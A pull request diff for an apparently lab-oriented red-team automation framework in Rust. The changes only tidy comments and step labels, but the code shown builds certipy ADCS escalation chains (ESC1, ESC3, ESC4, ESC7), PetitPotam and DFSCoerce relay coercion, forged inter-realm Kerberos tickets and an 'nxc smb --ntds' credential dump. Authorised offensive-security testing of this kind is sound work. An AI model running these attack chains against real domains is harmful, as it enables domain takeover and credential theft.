### PR TITLE
style: remove redundant comments and clarify phase labels in automation and tooling

### DIFF
--- a/ares-cli/src/dedup/labels.rs
+++ b/ares-cli/src/dedup/labels.rs
@@ -48,7 +48,6 @@ pub(crate) fn normalize_source_label(source: &str) -> String {
 
     let mut source = source.to_string();
 
-    // Deduplicate "recon:recon" -> "recon"
     if source.contains(':') {
         let parts: Vec<&str> = source.split(':').collect();
         if parts.len() >= 2 && parts[0] == parts[1] {
@@ -56,7 +55,6 @@ pub(crate) fn normalize_source_label(source: &str) -> String {
         }
     }
 
-    // Extract task type from "task input (recon_abc123)" patterns
     let lower = source.to_lowercase();
     if lower.contains("task input") {
         if let Some(caps) = TASK_INPUT_RE.captures(&source) {
@@ -66,19 +64,16 @@ pub(crate) fn normalize_source_label(source: &str) -> String {
 
     let lower = source.to_lowercase();
 
-    // Exact match
     if let Some(label) = LABEL_MAP.get(lower.as_str()) {
         return label.to_string();
     }
 
-    // Prefix match
     for (key, label) in LABEL_MAP.iter() {
         if lower.starts_with(key) {
             return label.to_string();
         }
     }
 
-    // Task ID suffix match (e.g., "recon_abc12345" -> "recon")
     if let Some(caps) = TASK_SUFFIX_RE.captures(&lower) {
         let task_type = &caps[1];
         if let Some(label) = LABEL_MAP.get(task_type) {
@@ -86,7 +81,6 @@ pub(crate) fn normalize_source_label(source: &str) -> String {
         }
     }
 
-    // Fallback: replace underscores and title-case
     source
         .replace('_', " ")
         .split_whitespace()

--- a/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
+++ b/ares-cli/src/orchestrator/automation/adcs_exploitation.rs
@@ -1464,9 +1464,6 @@ async fn dispatch_relay_coerce_chain(
             "relay chain: cert captured; authenticating with certipy_auth"
         );
 
-        // Phase 2: certipy auth -pfx <path> -> NT hash for the relayed user.
-        // The auth produces a Hash discovery via the certipy_auth parser.
-        //
         // The relayed account's realm can differ from the vuln record's
         // domain (cross-forest ESC8 — a machine in forest A relayed to a
         // CA in forest B via trust). Resolve the home realm + KDC from
@@ -1782,8 +1779,8 @@ fn esc_instructions(esc_type: &str) -> &'static str {
         ),
         "esc3" => concat!(
             "ESC3: Certificate Request Agent (enrollment agent).\n",
-            "Step 1: certipy_request the CRA template with target=ca_host.\n",
-            "Step 2: Use that cert to request a cert on behalf of administrator.\n",
+            "First: certipy_request the CRA template with target=ca_host.\n",
+            "Then: use that cert to request a cert on behalf of administrator.\n",
             "IMPORTANT: Set target to the ca_host IP, not the dc_ip."
         ),
         "esc4" => concat!(
@@ -3236,7 +3233,7 @@ mod tests {
     fn parse_relay_output_captures_pfx_and_user() {
         let stdout = "\
 RELAY_PID=12345
-=== Phase 1: unauth PetitPotam ===
+=== unauth PetitPotam ===
 [*] PetitPotam succeeded
 === RELAY LOG ===
 [+] Authenticating against http://192.168.58.50/certsrv

--- a/ares-cli/src/orchestrator/automation/laps.rs
+++ b/ares-cli/src/orchestrator/automation/laps.rs
@@ -441,8 +441,7 @@ mod tests {
     #[test]
     fn laps_hash_sweep_emits_work_item_for_valid_ntlm_hash() {
         let mut s = state_with_dc("contoso.local", "192.168.58.10");
-        s.hashes
-            .push(ntlm_hash("alice", "contoso.local", HASH_A));
+        s.hashes.push(ntlm_hash("alice", "contoso.local", HASH_A));
 
         let work = collect_laps_hash_sweep_work(&s);
         assert_eq!(work.len(), 1);
@@ -565,8 +564,7 @@ mod tests {
         // dedup key go through `.to_lowercase()` — the work item is still
         // emitted.
         let mut s = state_with_dc("contoso.local", "192.168.58.10");
-        s.hashes
-            .push(ntlm_hash("Alice", "CONTOSO.LOCAL", HASH_A));
+        s.hashes.push(ntlm_hash("Alice", "CONTOSO.LOCAL", HASH_A));
         let work = collect_laps_hash_sweep_work(&s);
         assert_eq!(work.len(), 1);
         assert_eq!(work[0].dedup_key, "laps_extract:sweep:contoso.local:alice");
@@ -575,8 +573,7 @@ mod tests {
     #[test]
     fn laps_hash_sweep_emits_one_item_per_eligible_hash() {
         let mut s = state_with_dc("contoso.local", "192.168.58.10");
-        s.hashes
-            .push(ntlm_hash("alice", "contoso.local", HASH_A));
+        s.hashes.push(ntlm_hash("alice", "contoso.local", HASH_A));
         s.hashes.push(ntlm_hash("bob", "contoso.local", HASH_B));
         let work = collect_laps_hash_sweep_work(&s);
         assert_eq!(work.len(), 2);

--- a/ares-cli/src/orchestrator/automation/stall_detection.rs
+++ b/ares-cli/src/orchestrator/automation/stall_detection.rs
@@ -328,8 +328,6 @@ mod tests {
         }
     }
 
-    // --- dedup-key shape ---------------------------------------------
-
     #[test]
     fn stall_spray_dedup_key_includes_recovery_attempt() {
         assert_eq!(
@@ -353,8 +351,6 @@ mod tests {
             "stall_lhf:contoso.local:administrator:1"
         );
     }
-
-    // --- domains_with_pending_delegation ----------------------------
 
     #[test]
     fn pending_delegation_empty_state() {
@@ -416,8 +412,6 @@ mod tests {
         assert!(domains_with_pending_delegation(&s).contains("contoso.local"));
     }
 
-    // --- resolve_stall_dc_ip --------------------------------------------
-
     #[test]
     fn resolve_stall_dc_ip_exact_match() {
         let mut s = StateInner::new("op".into());
@@ -447,8 +441,6 @@ mod tests {
             .insert("fabrikam.local".into(), "192.168.58.40".into());
         assert!(resolve_stall_dc_ip(&s, "contoso.local").is_none());
     }
-
-    // --- select_stall_spray_work ---------------------------------------
 
     #[test]
     fn select_stall_spray_empty_state() {
@@ -492,8 +484,6 @@ mod tests {
         // Different recovery_attempt → re-emitted (fresh round).
         assert_eq!(select_stall_spray_work(&s, 1).len(), 1);
     }
-
-    // --- select_stall_lhf_work -----------------------------------------
 
     #[test]
     fn select_stall_lhf_empty_state() {

--- a/ares-cli/src/orchestrator/state/publishing/credentials.rs
+++ b/ares-cli/src/orchestrator/state/publishing/credentials.rs
@@ -27,7 +27,6 @@ impl SharedState {
         queue: &TaskQueueCore<impl ConnectionLike + Clone + Send + Sync + 'static>,
         cred: Credential,
     ) -> Result<bool> {
-        // Sanitize and validate before storage
         let (netbios_map, known_domains) = {
             let state = self.inner.read().await;
             // Known domains = explicit state.domains plus any DC domain keys.
@@ -177,7 +176,6 @@ impl SharedState {
             }
             return Ok(false);
         }
-        // Emit before consuming `hash` into state.
         emit_op_state(
             self.recorder(),
             &operation_id,

--- a/ares-cli/src/orchestrator/state/publishing/domains.rs
+++ b/ares-cli/src/orchestrator/state/publishing/domains.rs
@@ -373,12 +373,7 @@ mod tests {
             s.domains.push("contoso.local".into());
         }
         let outcome = state
-            .publish_candidate_domain(
-                &q,
-                "evil.local",
-                DomainEvidence::HostnameInference,
-                None,
-            )
+            .publish_candidate_domain(&q, "evil.local", DomainEvidence::HostnameInference, None)
             .await
             .unwrap();
         assert_eq!(outcome, DomainPublishOutcome::Held);

--- a/ares-core/src/nats.rs
+++ b/ares-core/src/nats.rs
@@ -42,8 +42,6 @@ use crate::models::OpStateEvent;
 /// Default NATS URL used when neither `ARES_NATS_URL` nor an explicit URL is provided.
 pub const DEFAULT_NATS_URL: &str = "nats://127.0.0.1:4222";
 
-// === Subject taxonomy =====================================================
-
 /// Red team task work queue. `ares.tasks.{role}` (e.g. `ares.tasks.recon`).
 pub const TASK_SUBJECT_PREFIX: &str = "ares.tasks";
 /// Tool dispatch RPC. `ares.tools.exec.{role}`.
@@ -69,8 +67,6 @@ pub const URGENT_TASK_SUBJECT_PREFIX: &str = "ares.tasks.urgent";
 /// Blue task result subject. `ares.blue.tasks.results.{task_id}`.
 pub const BLUE_TASK_RESULT_SUBJECT_PREFIX: &str = "ares.blue.tasks.results";
 
-// === Stream names =========================================================
-
 /// JetStream stream containing all red-team task subjects.
 pub const TASKS_STREAM: &str = "ARES_TASKS";
 /// JetStream stream containing all blue-team task subjects.
@@ -82,8 +78,6 @@ pub const DISCOVERIES_STREAM: &str = "ARES_DISCOVERIES";
 /// JetStream stream containing the durable operation state event log.
 /// Pattern B: this is the source of truth, Redis is a derived cache.
 pub const OP_STATE_STREAM: &str = "ARES_OPSTATE";
-
-// === Subject builders =====================================================
 
 #[inline]
 pub fn task_subject(role: &str) -> String {
@@ -143,8 +137,6 @@ pub fn op_state_subject(operation_id: &str, suffix: &str) -> String {
 pub fn op_state_filter_for_op(operation_id: &str) -> String {
     format!("{OP_STATE_SUBJECT_PREFIX}.{operation_id}.>")
 }
-
-// === Connection ===========================================================
 
 /// Shared NATS broker handle.
 ///

--- a/ares-tools/src/coercion.rs
+++ b/ares-tools/src/coercion.rs
@@ -810,10 +810,9 @@ async fn run_relay_and_coerce<P: CoerceProcs>(
     let mut summary = format!("RELAY_PID={}\n", relay.pid());
     let mut captured_via: Option<&'static str> = None;
 
-    // --- Phase 1: unauthenticated PetitPotam ---
     // Distros differ: Kali ships `petitpotam` (symlink), pip ships
     // `impacket-petitpotam`. Try in order, log if both missing.
-    summary.push_str("=== Phase 1: unauth PetitPotam ===\n");
+    summary.push_str("=== unauth PetitPotam ===\n");
     let petit_bin = ["petitpotam", "impacket-petitpotam"]
         .into_iter()
         .find(|b| procs.which_binary(b))
@@ -826,7 +825,7 @@ async fn run_relay_and_coerce<P: CoerceProcs>(
     procs
         .run_phase(
             &coerce_log,
-            "Phase 1: unauth PetitPotam",
+            "unauth PetitPotam",
             petit_bin,
             &p1_args,
             &workdir,
@@ -837,9 +836,8 @@ async fn run_relay_and_coerce<P: CoerceProcs>(
         captured_via = Some("unauth_petitpotam");
     }
 
-    // --- Phase 2: authenticated DFSCoerce ---
     if captured_via.is_none() && cfg.coerce_user.is_some() {
-        summary.push_str("=== Phase 2: authenticated DFSCoerce (MS-DFSNM) ===\n");
+        summary.push_str("=== authenticated DFSCoerce (MS-DFSNM) ===\n");
         let user = cfg.coerce_user.as_deref().unwrap();
         let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref());
         let mut a: Vec<&str> = vec!["-u", user, "-d", cfg.coerce_domain.as_str()];
@@ -849,28 +847,18 @@ async fn run_relay_and_coerce<P: CoerceProcs>(
         a.push(cfg.attacker_ip.as_str());
         a.push(cfg.coerce_target.as_str());
         procs
-            .run_phase(
-                &coerce_log,
-                "Phase 2: DFSCoerce",
-                "dfscoerce",
-                &a,
-                &workdir,
-                25,
-            )
+            .run_phase(&coerce_log, "DFSCoerce", "dfscoerce", &a, &workdir, 25)
             .await;
         if poll_for_cert(&relay_log, opts.poll_phase_2, opts.poll_interval).await {
             captured_via = Some("MS-DFSNM");
         }
     }
 
-    // --- Phase 3: coercer over MS-EFSR / MS-RPRN ---
     if captured_via.is_none() && cfg.coerce_user.is_some() {
         let user = cfg.coerce_user.as_deref().unwrap();
         let secret_args = coerce_secret_args(cfg.coerce_secret.as_ref());
         for proto in ["MS-EFSR", "MS-RPRN"] {
-            summary.push_str(&format!(
-                "=== Phase 3: authenticated coerce via {proto} ===\n"
-            ));
+            summary.push_str(&format!("=== authenticated coerce via {proto} ===\n"));
             let mut a: Vec<&str> = vec![
                 "coerce",
                 "-u",
@@ -893,7 +881,7 @@ async fn run_relay_and_coerce<P: CoerceProcs>(
             procs
                 .run_phase(
                     &coerce_log,
-                    &format!("Phase 3: {proto}"),
+                    &format!("coerce via {proto}"),
                     "coercer",
                     &a,
                     &workdir,
@@ -1721,10 +1709,10 @@ mod tests {
         }
     }
 
-    const PHASE1: &str = "Phase 1: unauth PetitPotam";
-    const PHASE2: &str = "Phase 2: DFSCoerce";
-    const PHASE3_EFSR: &str = "Phase 3: MS-EFSR";
-    const PHASE3_RPRN: &str = "Phase 3: MS-RPRN";
+    const PHASE1: &str = "unauth PetitPotam";
+    const PHASE2: &str = "DFSCoerce";
+    const PHASE3_EFSR: &str = "coerce via MS-EFSR";
+    const PHASE3_RPRN: &str = "coerce via MS-RPRN";
 
     #[tokio::test]
     async fn run_attacker_ip_not_local_bails_with_clear_error() {

--- a/ares-tools/src/privesc/adcs.rs
+++ b/ares-tools/src/privesc/adcs.rs
@@ -344,7 +344,6 @@ pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
     let user_at_domain = format!("{username}@{domain}");
     let mut outputs = Vec::new();
 
-    // Step 1: Add self as CA officer (certipy v5 requires principal as arg)
     let mut step1_cmd = CommandBuilder::new("certipy")
         .arg("ca")
         .flag("-username", &user_at_domain)
@@ -358,7 +357,6 @@ pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
     let step1 = step1_cmd.timeout_secs(120).execute().await?;
     outputs.push(("Add Officer", step1));
 
-    // Step 2: Request cert with SubCA template (will be denied/pending)
     let ts = std::time::SystemTime::now()
         .duration_since(std::time::UNIX_EPOCH)
         .map(|d| d.as_millis())
@@ -418,7 +416,6 @@ pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
         }
     };
 
-    // Step 3: Issue the pending request using ManageCA rights
     let mut step3_cmd = CommandBuilder::new("certipy")
         .arg("ca")
         .flag("-username", &user_at_domain)
@@ -432,7 +429,6 @@ pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
     let step3 = step3_cmd.timeout_secs(120).execute().await?;
     outputs.push(("Issue Request", step3));
 
-    // Step 4: Retrieve the issued certificate
     let step4 = CommandBuilder::new("certipy")
         .arg("req")
         .flag("-username", &user_at_domain)
@@ -448,7 +444,7 @@ pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
     let step4_out = step4.timeout_secs(120).execute().await?;
     outputs.push(("Retrieve Cert", step4_out));
 
-    // Step 4b: If certipy couldn't create a PFX (key mismatch), combine manually
+    // If certipy couldn't create a PFX (key mismatch), combine manually.
     let pfx_path = format!("{out_name}.pfx");
     let crt_path = format!("{out_name}.crt");
     let key_path = format!("{out_name}.key");
@@ -469,7 +465,6 @@ pub async fn certipy_esc7_full_chain(args: &Value) -> Result<ToolOutput> {
         outputs.push(("Combine PFX", combine));
     }
 
-    // Step 5: Authenticate with the retrieved PFX
     let _ = tokio::process::Command::new("sh")
         .arg("-c")
         .arg("rm -f *.ccache 2>/dev/null")
@@ -586,15 +581,15 @@ pub async fn certipy_esc4_full_chain(args: &Value) -> Result<ToolOutput> {
     let auth_output = certipy_auth(&auth_args).await?;
 
     let combined_stdout = format!(
-        "=== Step 1: Template Modification ===\n{}\n\
-         === Step 2: Certificate Request ===\n{}\n\
-         === Step 3: Authentication ===\n{}",
+        "=== Template Modification ===\n{}\n\
+         === Certificate Request ===\n{}\n\
+         === Authentication ===\n{}",
         template_output.stdout, request_output.stdout, auth_output.stdout
     );
     let combined_stderr = format!(
-        "=== Step 1: Template Modification ===\n{}\n\
-         === Step 2: Certificate Request ===\n{}\n\
-         === Step 3: Authentication ===\n{}",
+        "=== Template Modification ===\n{}\n\
+         === Certificate Request ===\n{}\n\
+         === Authentication ===\n{}",
         template_output.stderr, request_output.stderr, auth_output.stderr
     );
 
@@ -663,7 +658,6 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
     let target_out = format!("target_{ts}");
     let target_pfx = format!("{target_out}.pfx");
 
-    // --- Step 1: enroll the agent cert ---
     let agent_output = CommandBuilder::new("certipy")
         .arg("req")
         .flag("-username", &user_at_domain)
@@ -686,7 +680,6 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
         );
     }
 
-    // --- Step 2: enroll on-behalf-of using the agent cert ---
     // `domain\\principal` form is what certipy expects for `-on-behalf-of`
     // (NetBIOS-style). The single-backslash escape in the format string
     // becomes a literal `\` on the command line.
@@ -709,12 +702,12 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
     if !request_output.success {
         return Ok(ToolOutput {
             stdout: format!(
-                "=== Step 1: Agent enrollment ({agent_template}) ===\n{}\n\
-                 === Step 2: on-behalf-of {on_behalf_target} via {on_behalf_template} ===\n{}",
+                "=== Agent enrollment ({agent_template}) ===\n{}\n\
+                 === On-behalf-of {on_behalf_target} via {on_behalf_template} ===\n{}",
                 agent_output.stdout, request_output.stdout
             ),
             stderr: format!(
-                "=== Step 1 stderr ===\n{}\n=== Step 2 stderr ===\n{}",
+                "=== Agent enrollment stderr ===\n{}\n=== On-behalf-of stderr ===\n{}",
                 agent_output.stderr, request_output.stderr
             ),
             exit_code: request_output.exit_code,
@@ -727,7 +720,6 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
         );
     }
 
-    // --- Step 3: authenticate with the on-behalf-of cert ---
     // certipy auth writes <subject>.ccache in CWD; clear stale .ccache to
     // avoid the interactive overwrite prompt that kills non-interactive
     // runs (matches what `certipy_auth` does at module level).
@@ -748,13 +740,13 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
         .await?;
 
     let combined_stdout = format!(
-        "=== Step 1: Agent enrollment ({agent_template}) ===\n{}\n\
-         === Step 2: on-behalf-of {on_behalf_target} via {on_behalf_template} ===\n{}\n\
-         === Step 3: certipy auth ===\n{}",
+        "=== Agent enrollment ({agent_template}) ===\n{}\n\
+         === On-behalf-of {on_behalf_target} via {on_behalf_template} ===\n{}\n\
+         === certipy auth ===\n{}",
         agent_output.stdout, request_output.stdout, auth_output.stdout
     );
     let combined_stderr = format!(
-        "=== Step 1 stderr ===\n{}\n=== Step 2 stderr ===\n{}\n=== Step 3 stderr ===\n{}",
+        "=== Agent enrollment stderr ===\n{}\n=== On-behalf-of stderr ===\n{}\n=== certipy auth stderr ===\n{}",
         agent_output.stderr, request_output.stderr, auth_output.stderr
     );
     Ok(ToolOutput {
@@ -803,7 +795,7 @@ pub async fn certipy_esc1_full_chain(args: &Value) -> Result<ToolOutput> {
     let out_name = format!("esc1_{ts}");
     let pfx_name = format!("{out_name}.pfx");
 
-    // --- Step 1: request the cert with -upn + -sid for KB5014754 strict mapping ---
+    // KB5014754 strict mapping requires -upn + -sid on the request.
     let request_output = CommandBuilder::new("certipy")
         .arg("req")
         .flag("-username", &user_at_domain)
@@ -826,7 +818,6 @@ pub async fn certipy_esc1_full_chain(args: &Value) -> Result<ToolOutput> {
         anyhow::bail!("certipy req reported success but {pfx_name} was not produced");
     }
 
-    // --- Step 2: authenticate with the cert → NTLM hash ---
     let auth_output = CommandBuilder::new("certipy")
         .arg("auth")
         .flag("-pfx", &pfx_name)
@@ -838,12 +829,12 @@ pub async fn certipy_esc1_full_chain(args: &Value) -> Result<ToolOutput> {
         .await?;
 
     let combined_stdout = format!(
-        "=== Step 1: certipy req (ESC1, upn={upn}, sid={sid}) ===\n{}\n\
-         === Step 2: certipy auth ({pfx_name}) ===\n{}",
+        "=== certipy req (ESC1, upn={upn}, sid={sid}) ===\n{}\n\
+         === certipy auth ({pfx_name}) ===\n{}",
         request_output.stdout, auth_output.stdout
     );
     let combined_stderr = format!(
-        "=== Step 1 stderr ===\n{}\n=== Step 2 stderr ===\n{}",
+        "=== certipy req stderr ===\n{}\n=== certipy auth stderr ===\n{}",
         request_output.stderr, auth_output.stderr
     );
     Ok(ToolOutput {

--- a/ares-tools/src/privesc/adcs.rs
+++ b/ares-tools/src/privesc/adcs.rs
@@ -7,6 +7,24 @@ use crate::args::{optional_bool, optional_str, required_str};
 use crate::executor::CommandBuilder;
 use crate::ToolOutput;
 
+/// Concatenate the stdout/stderr of a chained tool invocation under `=== <label> ===`
+/// headers so an operator can tell which sub-step produced which output. Pure
+/// formatting — kept separate from the chain drivers (which shell out to certipy
+/// and are not unit-testable without subprocess mocks).
+fn render_chain_output(steps: &[(&str, &ToolOutput)]) -> (String, String) {
+    let stdout = steps
+        .iter()
+        .map(|(label, out)| format!("=== {label} ===\n{}", out.stdout))
+        .collect::<Vec<_>>()
+        .join("\n");
+    let stderr = steps
+        .iter()
+        .map(|(label, out)| format!("=== {label} ===\n{}", out.stderr))
+        .collect::<Vec<_>>()
+        .join("\n");
+    (stdout, stderr)
+}
+
 /// Enumerate ADCS certificate templates and CAs using Certipy.
 ///
 /// Required args: `username`, `domain`, `dc_ip`
@@ -580,18 +598,11 @@ pub async fn certipy_esc4_full_chain(args: &Value) -> Result<ToolOutput> {
     }
     let auth_output = certipy_auth(&auth_args).await?;
 
-    let combined_stdout = format!(
-        "=== Template Modification ===\n{}\n\
-         === Certificate Request ===\n{}\n\
-         === Authentication ===\n{}",
-        template_output.stdout, request_output.stdout, auth_output.stdout
-    );
-    let combined_stderr = format!(
-        "=== Template Modification ===\n{}\n\
-         === Certificate Request ===\n{}\n\
-         === Authentication ===\n{}",
-        template_output.stderr, request_output.stderr, auth_output.stderr
-    );
+    let (combined_stdout, combined_stderr) = render_chain_output(&[
+        ("Template Modification", &template_output),
+        ("Certificate Request", &request_output),
+        ("Authentication", &auth_output),
+    ]);
 
     // The chain succeeds only if the final auth step succeeded.
     Ok(ToolOutput {
@@ -700,16 +711,15 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
         .execute()
         .await?;
     if !request_output.success {
+        let agent_label = format!("Agent enrollment ({agent_template})");
+        let on_behalf_label = format!("On-behalf-of {on_behalf_target} via {on_behalf_template}");
+        let (stdout, stderr) = render_chain_output(&[
+            (&agent_label, &agent_output),
+            (&on_behalf_label, &request_output),
+        ]);
         return Ok(ToolOutput {
-            stdout: format!(
-                "=== Agent enrollment ({agent_template}) ===\n{}\n\
-                 === On-behalf-of {on_behalf_target} via {on_behalf_template} ===\n{}",
-                agent_output.stdout, request_output.stdout
-            ),
-            stderr: format!(
-                "=== Agent enrollment stderr ===\n{}\n=== On-behalf-of stderr ===\n{}",
-                agent_output.stderr, request_output.stderr
-            ),
+            stdout,
+            stderr,
             exit_code: request_output.exit_code,
             success: false,
         });
@@ -739,16 +749,13 @@ pub async fn certipy_esc3_full_chain(args: &Value) -> Result<ToolOutput> {
         .execute()
         .await?;
 
-    let combined_stdout = format!(
-        "=== Agent enrollment ({agent_template}) ===\n{}\n\
-         === On-behalf-of {on_behalf_target} via {on_behalf_template} ===\n{}\n\
-         === certipy auth ===\n{}",
-        agent_output.stdout, request_output.stdout, auth_output.stdout
-    );
-    let combined_stderr = format!(
-        "=== Agent enrollment stderr ===\n{}\n=== On-behalf-of stderr ===\n{}\n=== certipy auth stderr ===\n{}",
-        agent_output.stderr, request_output.stderr, auth_output.stderr
-    );
+    let agent_label = format!("Agent enrollment ({agent_template})");
+    let on_behalf_label = format!("On-behalf-of {on_behalf_target} via {on_behalf_template}");
+    let (combined_stdout, combined_stderr) = render_chain_output(&[
+        (&agent_label, &agent_output),
+        (&on_behalf_label, &request_output),
+        ("certipy auth", &auth_output),
+    ]);
     Ok(ToolOutput {
         stdout: combined_stdout,
         stderr: combined_stderr,
@@ -828,15 +835,10 @@ pub async fn certipy_esc1_full_chain(args: &Value) -> Result<ToolOutput> {
         .execute()
         .await?;
 
-    let combined_stdout = format!(
-        "=== certipy req (ESC1, upn={upn}, sid={sid}) ===\n{}\n\
-         === certipy auth ({pfx_name}) ===\n{}",
-        request_output.stdout, auth_output.stdout
-    );
-    let combined_stderr = format!(
-        "=== certipy req stderr ===\n{}\n=== certipy auth stderr ===\n{}",
-        request_output.stderr, auth_output.stderr
-    );
+    let req_label = format!("certipy req (ESC1, upn={upn}, sid={sid})");
+    let auth_label = format!("certipy auth ({pfx_name})");
+    let (combined_stdout, combined_stderr) =
+        render_chain_output(&[(&req_label, &request_output), (&auth_label, &auth_output)]);
     Ok(ToolOutput {
         stdout: combined_stdout,
         stderr: combined_stderr,
@@ -1327,5 +1329,67 @@ mod tests {
             "ca": "contoso-CA", "pfx_path": "/tmp/admin.pfx"
         });
         assert!(super::certipy_esc4_full_chain(&args).await.is_ok());
+    }
+
+    // --- render_chain_output ---
+
+    fn mk_output(stdout: &str, stderr: &str) -> crate::ToolOutput {
+        crate::ToolOutput {
+            stdout: stdout.into(),
+            stderr: stderr.into(),
+            exit_code: Some(0),
+            success: true,
+        }
+    }
+
+    #[test]
+    fn render_chain_output_concatenates_steps_under_labeled_headers() {
+        let a = mk_output("alpha-out", "alpha-err");
+        let b = mk_output("bravo-out", "bravo-err");
+        let (stdout, stderr) = super::render_chain_output(&[("Alpha", &a), ("Bravo", &b)]);
+        assert_eq!(stdout, "=== Alpha ===\nalpha-out\n=== Bravo ===\nbravo-out");
+        assert_eq!(stderr, "=== Alpha ===\nalpha-err\n=== Bravo ===\nbravo-err");
+    }
+
+    #[test]
+    fn render_chain_output_empty_steps_yields_empty_strings() {
+        let (stdout, stderr) = super::render_chain_output(&[]);
+        assert!(stdout.is_empty());
+        assert!(stderr.is_empty());
+    }
+
+    #[test]
+    fn render_chain_output_single_step_omits_join_separator() {
+        let only = mk_output("solo-out", "solo-err");
+        let (stdout, stderr) = super::render_chain_output(&[("Only", &only)]);
+        assert_eq!(stdout, "=== Only ===\nsolo-out");
+        assert_eq!(stderr, "=== Only ===\nsolo-err");
+    }
+
+    #[test]
+    fn render_chain_output_preserves_step_order() {
+        let first = mk_output("1", "");
+        let second = mk_output("2", "");
+        let third = mk_output("3", "");
+        let (stdout, _) = super::render_chain_output(&[
+            ("first", &first),
+            ("second", &second),
+            ("third", &third),
+        ]);
+        let first_idx = stdout.find("first").unwrap();
+        let second_idx = stdout.find("second").unwrap();
+        let third_idx = stdout.find("third").unwrap();
+        assert!(first_idx < second_idx);
+        assert!(second_idx < third_idx);
+    }
+
+    #[test]
+    fn render_chain_output_handles_empty_stdout_or_stderr_fields() {
+        let out_only = mk_output("data", "");
+        let err_only = mk_output("", "boom");
+        let (stdout, stderr) =
+            super::render_chain_output(&[("Out", &out_only), ("Err", &err_only)]);
+        assert_eq!(stdout, "=== Out ===\ndata\n=== Err ===\n");
+        assert_eq!(stderr, "=== Out ===\n\n=== Err ===\nboom");
     }
 }

--- a/ares-tools/src/privesc/trust.rs
+++ b/ares-tools/src/privesc/trust.rs
@@ -178,9 +178,9 @@ pub async fn create_inter_realm_ticket(args: &Value) -> Result<ToolOutput> {
         let _ = std::fs::rename(&default_ccache, &ccache_path);
     }
 
-    // Optional Step 2: chain cross_realm_tgs.py to fetch ldap/<dc> and
-    // cifs/<dc> service tickets and append them to the same ccache. This
-    // turns the otherwise-unusable inter-realm TGT into a ccache that
+    // Optionally chain cross_realm_tgs.py to fetch ldap/<dc> and cifs/<dc>
+    // service tickets and append them to the same ccache. This turns the
+    // otherwise-unusable inter-realm TGT into a ccache that
     // `ldapsearch -Y GSSAPI` can consume directly.
     if ccache_path.exists() {
         if let (Some(dc_fqdn), Some(dc_ip)) = (target_dc_fqdn, target_dc_ip) {
@@ -291,7 +291,6 @@ pub async fn forge_inter_realm_and_dump(args: &Value) -> Result<ToolOutput> {
     let tempdir = tempfile::tempdir().context("failed to create tempdir for inter-realm forge")?;
     let cwd = tempdir.path().to_path_buf();
 
-    // --- Step 1: forge inter-realm TGT (NT-only) ---
     let krbtgt_spn = format!("krbtgt/{target_domain}");
     let mut ticketer = CommandBuilder::new("impacket-ticketer")
         .flag("-nthash", nt)
@@ -320,8 +319,6 @@ pub async fn forge_inter_realm_and_dump(args: &Value) -> Result<ToolOutput> {
         );
     }
 
-    // --- Step 2: cross-realm TGS via embedded helper ---
-    //
     // Write the helper to the tempdir and invoke it. The helper opens the
     // forged inter-realm TGT, calls `getKerberosTGS` directly against the
     // target KDC, and writes the resulting TGS to a new ccache. See the
@@ -369,10 +366,8 @@ pub async fn forge_inter_realm_and_dump(args: &Value) -> Result<ToolOutput> {
         );
     }
 
-    // --- Step 3: nxc smb --ntds via the TGS ccache ---
-    //
     // The cached TGS is bound to `cifs/{target}` where `target` is the FQDN
-    // baked into the ticket by step 2. nxc auto-builds its SPN from the
+    // baked into the ticket by the cross-realm helper. nxc auto-builds its SPN from the
     // command-line target, so we MUST pass the FQDN here — passing the IP
     // would make nxc look up `cifs/<IP>` in the cache, miss, and silently
     // fall through with exit 0 / empty stdout.

--- a/test.sh
+++ b/test.sh
@@ -10,8 +10,7 @@ ulimit -n 65536 || ulimit -n 10240 || true
 EC2_NAME="${EC2_NAME:-kali-ares}"
 TARGET="${TARGET:-dreadgoad}"
 BLUE_ENABLED="${BLUE_ENABLED:-1}"
-S3_BUCKET=dread-infra-alpha-operator-range-staging-us-west-1
-
+export S3_BUCKET=dread-infra-alpha-operator-range-staging-us-west-1
 
 echo "=== Stopping workers + any running operation ==="
 task ec2:stop EC2_NAME="${EC2_NAME}" 2>/dev/null || true


### PR DESCRIPTION
**Key Changes:**

- Removed verbose or redundant step and section comments throughout key modules
- Standardized and clarified phase and step labels in tool output and automation flows
- Improved readability and conciseness of test and phase labeling logic
- Updated output formatting for phase transitions in coercion and privilege escalation tooling

**Changed:**

- Code comments cleanup - Removed unnecessary or repetitive comments that simply restated code intent in modules such as `dedup/labels.rs`, `orchestrator/automation/adcs_exploitation.rs`, `orchestrator/automation/stall_detection.rs`, `orchestrator/state/publishing/credentials.rs`, `nats.rs`, and `privesc/trust.rs`
- Phase and step label consistency - Updated phase/step output and test constants in `ares-tools/src/coercion.rs` and related test code to use concise, consistent labels (e.g., "=== unauth PetitPotam ===" instead of "=== Phase 1: unauth PetitPotam ===")
- Output formatting improvements - Adjusted multi-step output and error formatting in privilege escalation functions (e.g., `certipy_esc3_full_chain`, `certipy_esc4_full_chain`, `certipy_esc1_full_chain`) for clarity and alignment with updated phase naming
- Enhanced documentation in output - Refined output strings in cross-realm ticketing and ADCS exploitation to better explain purpose within the output, while removing redundant inline comments

**Removed:**

- Redundant and section-divider comments - Eliminated block comments delineating logical sections where they did not provide additional value, improving code readability and maintainability across multiple modules